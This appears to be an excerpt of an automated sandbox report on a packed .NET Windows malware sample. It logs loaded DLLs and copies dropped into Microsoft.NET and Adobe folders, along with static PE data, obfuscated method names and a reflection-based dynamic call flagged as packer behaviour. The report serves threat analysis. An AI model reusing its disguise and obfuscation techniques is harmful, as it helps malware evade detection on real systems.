Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ktmw32.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dlnashext.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wpdshext.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: slc.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ktmw32.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dlnashext.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wpdshext.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: slc.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Directory created: C:\Program Files\Uninstall Information\JPOyDhPFIytu.exe	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Directory created: C:\Program Files\Uninstall Information\599871f56ea49f	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\JPOyDhPFIytu.exe	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\599871f56ea49f	Jump to behavior

Source: yQrCGtNgsf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: yQrCGtNgsf.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: yQrCGtNgsf.exe

Static file information: File size 1912832 > 1048576

Source: yQrCGtNgsf.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1d2800

Source: yQrCGtNgsf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: JPOyDhPFIytu.exe, 00000007.00000002.1625194309.000000001AFD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.pdbX7@ source: JPOyDhPFIytu.exe, 0000000D.00000002.1763080386.000000001B4BC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.pdb source: JPOyDhPFIytu.exe, 0000001E.00000002.2066031775.000000001BB0E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: t\JPOyDhPFIytu.PDBd source: JPOyDhPFIytu.exe, 00000007.00000002.1625194309.000000001AFD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: JPOyDhPFIytu.exe, 0000001E.00000002.2066031775.000000001BB21000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 0. C089IL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb7 source: JPOyDhPFIytu.exe, 00000007.00000002.1625194309.000000001AFD0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: yQrCGtNgsf.exe, YV7vTgf9a9Ets2qr8Kd.cs

.Net Code: Type.GetTypeFromHandle(lKSfWrZqhJDhxYrQOZT.VJBKm10gPG7(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(lKSfWrZqhJDhxYrQOZT.VJBKm10gPG7(16777245)),Type.GetTypeFromHandle(lKSfWrZqhJDhxYrQOZT.VJBKm10gPG7(16777259))})

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Code function: 0_2_00007FFB4B3F00BD pushad ; iretd	0_2_00007FFB4B3F00C1
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Code function: 0_2_00007FFB4B7EC7CA push esp; ret	0_2_00007FFB4B7EC7CB
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Code function: 0_2_00007FFB4B7E6301 push eax; ret	0_2_00007FFB4B7E630D
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Code function: 0_2_00007FFB4B7EC9C9 push edx; ret	0_2_00007FFB4B7EC9CA
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Code function: 0_2_00007FFB4B7EC94D push ebx; ret	0_2_00007FFB4B7EC94F
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Code function: 0_2_00007FFB4B7E78EA push ds; ret	0_2_00007FFB4B7E78F0
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 7_2_00007FFB4B7D6301 push eax; ret	7_2_00007FFB4B7D630D
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 13_2_00007FFB4B4227A6 push FFFFFFE8h; retf	13_2_00007FFB4B4227C1
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 13_2_00007FFB4B4435A8 push eax; retf	13_2_00007FFB4B4435A9
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 13_2_00007FFB4B3F6902 push es; ret	13_2_00007FFB4B3F6907
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 13_2_00007FFB4B7D6301 push eax; ret	13_2_00007FFB4B7D630D
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 18_2_00007FFB4B7C6301 push eax; ret	18_2_00007FFB4B7C630D
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 25_2_00007FFB4B4100BD pushad ; iretd	25_2_00007FFB4B4100C1
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 25_2_00007FFB4B806306 push eax; ret	25_2_00007FFB4B80630D
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 30_2_00007FFB4B4435A8 push eax; retf	30_2_00007FFB4B4435A9
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 30_2_00007FFB4B3F6902 push es; ret	30_2_00007FFB4B3F6907
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 30_2_00007FFB4B3E01CD pushad ; ret	30_2_00007FFB4B3E0286
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 30_2_00007FFB4B3E00BD pushad ; iretd	30_2_00007FFB4B3E00C1
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 30_2_00007FFB4B7D6306 push eax; ret	30_2_00007FFB4B7D630D
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 35_2_00007FFB4B4435A8 push eax; retf	35_2_00007FFB4B4435A9
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 35_2_00007FFB4B4227A6 push FFFFFFE8h; retf	35_2_00007FFB4B4227C1
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 35_2_00007FFB4B3F6902 push es; ret	35_2_00007FFB4B3F6907
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 35_2_00007FFB4B3E01CD pushad ; ret	35_2_00007FFB4B3E0286
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 35_2_00007FFB4B3E00BD pushad ; iretd	35_2_00007FFB4B3E00C1
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 35_2_00007FFB4B7D6301 push eax; ret	35_2_00007FFB4B7D630D
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 40_2_00007FFB4B3F00BD pushad ; iretd	40_2_00007FFB4B3F00C1
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 40_2_00007FFB4B406902 push es; ret	40_2_00007FFB4B406907
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 40_2_00007FFB4B4535A8 push eax; retf	40_2_00007FFB4B4535A9
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 40_2_00007FFB4B7E6306 push eax; ret	40_2_00007FFB4B7E630D
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 45_2_00007FFB4B4735A8 push eax; retf	45_2_00007FFB4B4735A9
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Code function: 45_2_00007FFB4B4100BD pushad ; iretd	45_2_00007FFB4B4100C1

Source: yQrCGtNgsf.exe	Static PE information: section name: .text entropy: 7.539307714759452
Source: JPOyDhPFIytu.exe.0.dr	Static PE information: section name: .text entropy: 7.539307714759452
Source: JPOyDhPFIytu.exe0.0.dr	Static PE information: section name: .text entropy: 7.539307714759452
Source: JPOyDhPFIytu.exe1.0.dr	Static PE information: section name: .text entropy: 7.539307714759452
Source: JPOyDhPFIytu.exe2.0.dr	Static PE information: section name: .text entropy: 7.539307714759452

Source: yQrCGtNgsf.exe, DvbPX8YLvWuo51oXHMM.cs	High entropy of concatenated method names: 'jW2YyIHHoH', 'ukkYEJ2FO5', 'LPXnF64y7Q40qGD4DlBT', 'im6q8a4yQDiRjPVrhFv2', 'lNAFKr4yxg5QVhJsOcwE', 'YcJctt4ygyImh3PCy7mP', 'q06U9V4yRNWyxt3t1sbD', 'OCUiXP4yARI05efMfl2s', 'dZK0hs4ySNJQLkBlff6I', 'eElPtC4yJoIKZsF2FVTV'
Source: yQrCGtNgsf.exe, MH0HM5kcu7qqO4n4kGv.cs	High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'BIw4ve7LKnl', 'iA44k4PU8kY', 'XKJabQ4DVg9qL6oNf5Ma', 'W7Tukb4DFgH9mBgb5l8e', 'tGgVOR4DO4W2AKwBxGOb'
Source: yQrCGtNgsf.exe, psAF1K8KiVi3xSxBxKP.cs	High entropy of concatenated method names: 'NmL8kWmBus', 'un88mfrS65', 'PQ28MqTKOY', 'TLI8YnYuUF', 'BnY8v74XiG', 'QDo880jEnK', 'See8HhKQqg', 'E0u8bn81TG', 'nUj834oGYq', 'mnc8nJ6qIy'
Source: yQrCGtNgsf.exe, JbuyEAm0jJifc0CIZAk.cs	High entropy of concatenated method names: 'tu5mrZITyr', 'nT2mT1U0Ud', 'vlumW9pOnv', 'cmxkZJ4LEGq2GoYZiIwy', 'wSJ51j4L6SU3SHZVf3ts', 'WSVnLM4LjHexbyWkuB2K', 'vbaYnp4LygsUoB0BmymR', 'SnFmF0IQ3P', 'G3VmOJkPbA', 'nVvsoH4LDoaP2KSPo0A7'
Source: yQrCGtNgsf.exe, WYWsmUWxbqHEMATixYU.cs	High entropy of concatenated method names: 'sd7Wg2kTJI', 'CHgWRucbLC', 'pTOWAyULhd', 'm1NWS4dw9r', 'KFvWJTohU1', 'NajWPyg5Vm', 'Pj5WuYQCFd', 'Jj0WtliCXI', 'xJlW5PyXH2', 'WnDWB8NPgp'
Source: yQrCGtNgsf.exe, hqCa1qvHfFepx5Os6To.cs	High entropy of concatenated method names: 'cpLv35cYgA', 'iJcvnj7H8l', 'RuwvqCjxod', 'py5GQj4E3oyXfV3Uao0D', 'JIT2iG4EHYn0A2kObY95', 'NKnQVT4Eb400OhTsIrwt', 'Ja5Krg4EnjrSNI9fL9ia', 'yS5NiS4EqoZBvajUdUIh', 'tkp0WX4E1NM7nL1Jc26K', 'dEXWq04E04VgtIE5x15p'
Source: yQrCGtNgsf.exe, sUHFAkha5jNW62KqDCp.cs	High entropy of concatenated method names: 'XkR4vC97yI0', 'Q9U4McnM9hy', 'r7A4J04iz2D4mLMvFEsV', 'Ijma9d4iZUf9a64tE1Gd', 'R69GEm4iIb6koTqUp66K', 'IJYloZ4fXTRIse9QQMjf', 'nS5jXC4fkMbNKQt42XXu', 'qeVeiO4fKQTuyM5U4ggw', 'elnI5S4fe22e1eDQHjTP', 'OLIyuV4fm9NR0AJdIAPu'
Source: yQrCGtNgsf.exe, Dljj3gvSJYDfwGaQfJP.cs	High entropy of concatenated method names: 'nxeviY7GKO', 'JqAB484EzMY5xGDEfnh7', 'zy4Cur4EZVpgCxrlxfeh', 'eH5PgP4EICkF9yY4k1FW', 's3xZDJ46X1HeLgtpEb2u', 'qLrUmc464hW9At83bE3b', 'P9X', 'vmethod_0', 'pJJ4krRGc3h', 'imethod_0'
Source: yQrCGtNgsf.exe, dnOWXmMO93Y4jrPFYEm.cs	High entropy of concatenated method names: 'cUAMLJsHCi', 'dnZCmo4jDPBAn3v1ShyL', 'IYtDfw4jLx8QlEWlJRTa', 'zsUuIg4jjRCZjYS1HWul', 'MOn7mu4jyr75kp9m3LcF', 'E94', 'P9X', 'vmethod_0', 'hgM4ksshNYl', 'mg64v8dTUbq'
Source: yQrCGtNgsf.exe, hDPAnm4hWqTQatJKM7b.cs	High entropy of concatenated method names: 'P9X', 'vO64i2x7Ff', 'zNG4vX1Ii32', 'imethod_0', 'RE14f0JduN', 'hc7gvV4rBbxwjCaDbfTw', 'vyxRC34rhnoDlZ7Jd666', 'Xpi8fO4rtvt4IKYSDuIv', 'RMc8JV4r5O2AU05k5JG5', 'wwUfCA4rdcJmycs6pu1j'
Source: yQrCGtNgsf.exe, zoHUXZx6k9ZCVE4pasq.cs	High entropy of concatenated method names: 'opGDgk4dp1cjHEk8gyX0', 'jGco7M4dQuo4e1led4Lk', 'mdGIvN4dwuJJO9fIXSMk', 'ebvn214daX2mbZATMPis', 'sBROS44djuwNcJpJoFvN', 'MeunDn4dycYFG5T7FFD9', 'WnnMuF4dEiV18sOeZCqm', 'ttVjGZ4dD7s0FfhrTLq6', 'RfNToM4dL7HjFCdCnHSc'
Source: yQrCGtNgsf.exe, TtADfZl4Fy4mVifoslF.cs	High entropy of concatenated method names: 'rC9', 'method_0', 'hPw4vUe5Rwj', 'yO74vsUNNWc', 'pISIke47LSe5Z9EGKJUm', 'Dy9Wt147jSirjZCR5DbK', 'e6wD3E47yiTrHuugWO10', 'JGvhXN47EnLKXtCfiNJj', 'z2oThf4760du5A7a1vm4', 'Bq2tuV47wuNBWfoEWm1Q'
Source: yQrCGtNgsf.exe, T6YZ9wpLac9jGIqbLEc.cs	High entropy of concatenated method names: 'ScJpypJ4K6', 'N0ppEkmDPw', 'NDvp6PbFr9', 'LK3pw3S1hQ', 'eGMpaPq7Yi', 'eddppd7ZcD', 'lTLpQYW1lU', 'ES3pxj7Zyj', 'IPqp79sE19', 'QMOpgnoBm5'
Source: yQrCGtNgsf.exe, q1WIioZoaFLGWWvfKkx.cs	High entropy of concatenated method names: 'GPQZWLX6Cq', 'WSEZDKbot3', 'w7aZLnjOp2', 'AwTZjV6SUa', 'ljYZyA3Tv0', 'ojxZEYUlpL', 'FDdZ6PQSCF', 'HYmZwMuP3A', 'Y2DZatLk1w', 'wM6ZpbQYEp'
Source: yQrCGtNgsf.exe, z3SosPZQgRaHd4C7XE4.cs	High entropy of concatenated method names: 'q8G4Mj0NQ3X', 'uaw4MyE3slR', 'uCs4ME8FtmE', 'UDd4M69CJEr', 'SDp4MwGRh2Y', 'BVh4Ma1lSPR', 'x6u4Mpbuj18', 'XOEImaC3AL', 'LQf4MQYLdpi', 'Wd54MxqtJ1b'
Source: yQrCGtNgsf.exe, zDHJmL8qudnHfVxrhaJ.cs	High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 't5XtNf46FjcUq1FGl9tC', 'aWLeAi46OadFUWM4cWtH', 'ixWuSG46ccxoZMiWfS1X', 'v8ZwvZ46Cf3HPCW16S07'
Source: yQrCGtNgsf.exe, Dk2UtgTIcp2EubvdW5p.cs	High entropy of concatenated method names: 'd2WWX59ws7', 'a2MW4MZa4j', 'gvfWKvWBHA', 'xeAWefYmqK', 'EcgWkw0D4a', 'BPRWmFEIf6', 'sKrFZj4JJGnAG4rM9pLN', 'VhSpnI4JAicjsbJTOZUU', 'KJKrew4JS29flAmSjXk0', 'qQXjft4JP5gMWy3nVhoy'
Source: yQrCGtNgsf.exe, HiEXX1NnIpB0mexsL1j.cs	High entropy of concatenated method names: 'weLF4KMDRR', 'aVVdtv4RlC8lZqaWBay9', 'TRhFxM4RU9UAl4SNwsUx', 'nBve6M4RsElPRSP7hMW3', 'NHpfMf4RNjkF423FoAkZ', 'my6N1v4CZU', 'hNcN0Qd5ux', 'UGxNGohY7b', 'J6tN937As8', 'PdrNo5tTtj'
Source: yQrCGtNgsf.exe, w4dtPTsqEjqOYnEpyn8.cs	High entropy of concatenated method names: 'oPDssHx3Be', 'W5T4Sh4xJABwO9sXFGv5', 'K2s8DE4xApmLKEEMpmfX', 'CSN4RG4xS31bI9xXc0XK', 'fRaMDB4xPQOyHTJwy9u4', 'mnms0WnhiP', 'FoOE7n4xpJOPWsP8fDVn', 'QAGhDp4xQsayP23eZ0I6', 'mLdgL84xxOXn6vcYJDZw', 'AjQdJl4x7dS3Bwq4pyGQ'
Source: yQrCGtNgsf.exe, GKtIxPsutcaKTShmZYJ.cs	High entropy of concatenated method names: 'i844vG3adXR', 'QIJs5W2CRP', 'RrE4v9oV2Vl', 'uOCUp547oqiMmn0ioV7o', 'PO838V47GDXmdPBS1CK2', 't52oNG479jW4eJNDf2CE', 'qJlFLe47UWe5Znye567F', 'IH9RSo47sORPhEqLXPcq', 'wxQhLs47lq1cEI3YwLCU', 'GSsODO47NTS5m2U4CIjK'
Source: yQrCGtNgsf.exe, Owt4y1KL05DFLNjdcmc.cs	High entropy of concatenated method names: 'CYSK7iB7Mw', 'og7KgfInyA', 'ERwUN24TERCjCR8mKLmb', 'q39du04T6F2Wh9T9UG5n', 'pI5OQD4TwZRilV5WhAeE', 'cBEKJFXjME', 'CyZRMD4TxixrZWCA5RJq', 'Nu9qq44TpmEFu30sC1Pj', 'LbbgEU4TQpp9m2D79pEO', 'kJAKyKqf1H'
Source: yQrCGtNgsf.exe, tSOZGVYnEniAdQEtVOZ.cs	High entropy of concatenated method names: 'P9X', 'E284kVEIPsn', 'vmethod_0', 'imethod_0', 'j6ul324yG4RtiLqW6q31', 'YFuib64y9XUJBkrvd7ZR', 'ypfK0S4y1lNfebGgXTgJ', 'fdEkAS4y0OVQdMJPuE7p', 'EreMHl4yocJa25Lwf1hH'
Source: yQrCGtNgsf.exe, Afmt2fmRafHY49hHic4.cs	High entropy of concatenated method names: 'OsJmu1k11L', 'dpn8wg4LzhAIvrxatTGH', 'rXcl2K4LZvUyPvQpFUdl', 'To5DKc4LIuA3WdxEKXMF', 'iKfNM94jXs3tcoRBnKUS', 'pN356N4j4O09wTOFOnLJ', 'U1J', 'P9X', 'pAY4k0qPi4f', 'wQA4kGHUGok'
Source: yQrCGtNgsf.exe, D567mMFHbuSdWZM3X6E.cs	High entropy of concatenated method names: 'WX2FLNwqPT', 'BprF3dyTu0', 'uPkFnYKNVB', 'taKFq4Z1Uo', 'rymF1Asrr9', 'C5gF0fxl6C', 'GufFGbwCmg', 'sjwF9seSLR', 'amaFofnyTs', 'XdpFUqa3Hd'
